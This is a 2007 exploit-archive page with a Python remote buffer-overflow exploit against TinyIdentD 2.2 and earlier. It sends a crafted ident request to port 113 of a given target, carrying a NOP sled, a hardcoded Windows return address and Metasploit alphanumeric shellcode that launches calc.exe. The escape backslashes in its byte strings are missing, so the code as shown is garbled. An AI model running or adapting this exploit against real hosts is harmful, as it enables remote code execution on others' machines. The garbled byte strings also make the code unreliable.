TinyIdentD <= 2.2 Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TinyIdentD <= 2.2 Remote Buffer Overflow Exploit
# Published : 2007-05-14
# Author : Thomas Pollet
# Previous Title : webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield)
# Next Title : Samba 3.0.21-3.0.24 LSA trans names Heap Overflow

#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
import socket,sys
#jmp into nop sled
payload  = 'xebx20'  
#ident crap
payload += ', 28 : USERID : UNIX : '
#nop sled
payload +='XXXX'
# jmp *%esi
payload += 'x77x13x83x7c'  #XP kernel32.dll
#payload += 'xb1x63xd9x77' #W2K rpcrt4.dll
#metasploit alphanumeric shellcode calc.exe
shellcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
shellcode += "x49x49x48x49x49x49x49x49x49x49x49x49x51x5ax6ax44"
shellcode += "x58x50x30x41x30x41x6bx41x41x54x42x32x41x42x32x42"
shellcode += "x41x30x42x41x58x41x50x38x41x42x75x4ax49x69x6cx4b"
shellcode += "x58x51x54x65x50x57x70x45x50x4ex6bx67x35x35x6cx4e"
shellcode += "x6bx73x4cx55x55x71x68x67x71x68x6fx6cx4bx52x6fx46"
shellcode += "x78x4ex6bx51x4fx71x30x74x41x7ax4bx30x49x6cx4bx54"
shellcode += "x74x6ex6bx76x61x4ax4ex35x61x4bx70x6ax39x4cx6cx4d"
shellcode += "x54x6bx70x30x74x54x47x6ax61x6ax6ax64x4dx63x31x79"
shellcode += "x52x4ax4bx69x64x67x4bx32x74x65x74x66x64x31x65x4a"
shellcode += "x45x6cx4bx71x4fx31x34x57x71x48x6bx52x46x6ex6bx64"
shellcode += "x4cx52x6bx4ex6bx31x4fx77x6cx54x41x68x6bx4cx4bx57"
shellcode += "x6cx6cx4bx57x71x4ax4bx4ex69x41x4cx65x74x67x74x4a"
shellcode += "x63x75x61x4fx30x51x74x6cx4bx61x50x50x30x4fx75x4f"
shellcode += "x30x32x58x64x4cx4cx4bx71x50x54x4cx4cx4bx70x70x57"
shellcode += "x6cx4ex4dx6ex6bx73x58x35x58x4ax4bx36x69x6cx4bx4d"
shellcode += "x50x4cx70x67x70x75x50x37x70x4cx4bx45x38x35x6cx41"
shellcode += "x4fx57x41x68x76x53x50x30x56x6ex69x6bx48x6fx73x6f"
shellcode += "x30x63x4bx62x70x30x68x58x70x6fx7ax57x74x51x4fx45"
shellcode += "x38x6fx68x59x6ex4fx7ax66x6ex62x77x69x6fx38x67x73"
shellcode += "x53x52x41x30x6cx71x73x64x6ex35x35x30x78x70x65x45"
shellcode += "x50x44"

nopsize=523-len(payload)-len(shellcode)
nopsled=''
for i in range(nopsize):
    nopsled+='x90'

payload=payload.replace('XXXX',nopsled+shellcode)

try:
    target=sys.argv[1]
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,113))
    s.send(payload+'n')
    s.close()
    print 'done'
except:
    print 'usage : %s [target]'%sys.argv[0]

# www.Syue.com [2007-05-14]